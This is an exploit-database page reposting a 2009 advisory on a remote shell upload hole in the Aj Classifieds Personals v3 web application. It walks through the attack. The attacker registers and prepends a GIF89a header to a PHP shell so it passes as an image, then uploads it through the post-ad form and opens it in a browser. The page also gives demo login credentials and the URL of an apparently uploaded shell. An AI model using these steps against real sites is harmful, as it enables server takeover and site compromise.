[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Aj Classifieds - Personals v3 Remote Shell Upload Vulnerability

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4693
Category
web applications
Date add
16-01-2009
Platform
unsorted
===============================================================
Aj Classifieds - Personals v3 Remote Shell Upload Vulnerability
===============================================================



[~] AJClassifieds Personals RFu
[~]
[~] script down: http://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Realestate/
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu 
[~]
[~] Date: 16.01.09
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

first register to site 

you add this code your shell to head 

GIF89a; 

example your_shell.php:

GIF89a;
<?

...

...

...

?>

and save your_sheell.php

you go index.php?do=postad

add you post select your image for Main Image and Thumbnail Image

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp for demo:

user: demouser@ajsquare.com

pass: demouser

http://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Personal/uploadimages/20090116083033c.php

[~]----------------------------------------------------------------------



#  0day.today [2024-12-25]  #